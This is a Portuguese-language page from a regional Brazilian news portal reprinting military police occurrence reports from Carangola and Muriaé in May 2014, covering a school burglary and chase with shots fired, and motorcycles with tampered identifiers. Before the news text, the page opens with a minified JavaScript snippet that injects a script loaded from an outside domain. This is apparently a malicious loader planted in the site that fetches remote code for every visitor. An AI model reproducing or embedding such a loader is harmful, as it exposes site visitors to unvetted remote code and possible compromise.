;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrencias policiais Carangola e Região - 30/05/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrencias policiais Carangola e Região – 30/05/14.

pmbn

OCORRÊNCIAS DE DESTAQUE  MURIAÉ – 29/05/2014

                         75ª CIA PM- CARANGOLA-MG

 

NADA REGISTRAR.

                        76ª CIA PM – MURIAÉ

 FURTO QUALIFICADO EM ESCOLA PÚBLICA EM MURIAÉ-MG.

Em 30/05/2014, por volta das 03hs40min, após denúncia anônima recebida pela Sala de Operações da Unidade, dando conta que indivíduos haviam invadido a Escola Estadual Engenheiro Orlando Flores, localizada no bairro Dornelas em Muriaé, e que utilizavam um veículo GM/Chevette, de cor cinza para transportarem os materiais furtados, policiais militares imediatamente deslocaram para o citado endereço. No trajeto os policiais depararam com o veículo suspeito, sendo dado ordem de parada que não foi acatado pelo condutor do veículo, que veio a colidir contra a viatura policial, e seguiu na fuga onde depararam com outra viatura não obedecendo novamente ordem de parada, vindo a colidir frontalmente com a segunda guarnição, tendo o veículo suspeito parado. Em seguida o autor H.G.M., de 35 anos, saiu do interior do automóvel com a mão na cintura fazendo um gesto como se fosse sacar uma arma de fogo, sendo necessário um disparo de arma de fogo, pelo Sgt PM Roberto, não o atingindo o autor que continuou a fuga com a mão na cintura, sendo efetuado outro disparo pelo Sgt PM Leandro não atingindo o autor, o qual arremessou um objeto de cor preta aparentando ser uma arma de fogo no rio que margeia a Avenida Dante Bruno, sendo o autor capturado. Outros dois envolvidos que estavam no veículo fugiram, sendo alcançados e apreendidos e identificados como W.S.G.M., de 17 anos e I.J.S.A., de 17 anos. Ficou constatado posteriormente que na escola foram arrombadas aproximadamente seis salas, e sendo recuperados os produtos furtados, computares, grande quantidade de gêneros alimentícios, 02 data show, 01 telefone celular, 04 aparelhos DVD e aproximadamente R$117,00 em dinheiro, sendo os envolvidos encaminhados para delegacia de polícia juntamente com os materiais recolhidos e o veículo encaminhado para o pátio credenciado do Detran.

 

ADULTERAR SINAL/ IDENTIFICADOR DE VEICULO AUTOMOTOR EM VIEIRAS-MG.

Em 29/05/2014, por volta das 21hs40min, durante patrulhamento pela Rua Luiz José da Mata, foi fiscalizados duas motocicletas e constatado irregularidade, pois as mesmas estavam estacionadas frente a uma casa, sendo que uma motocicleta Honda ml de cor vermelha, que estava sem a placa de identificação e uma motocicleta Yamaha YBR 125, que estava com uma placa GNQ 6797, porém sem o lacre, a referida placa pertencia ao veículo Honda XL 125, de cor preta. As duas motocicletas estavam com os chassis raspados e em contato com o autor W.T.S.P., este confirmou ser proprietário motocicleta Yamaha YBR e seu irmão ser proprietário da motocicleta Honda ML, de cor vermelha, o qual não se encontrava pelo local. Os veículos foram recolhidos ao pátio credenciado do Detran e o autor encaminhado a delegacia de Polícia.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.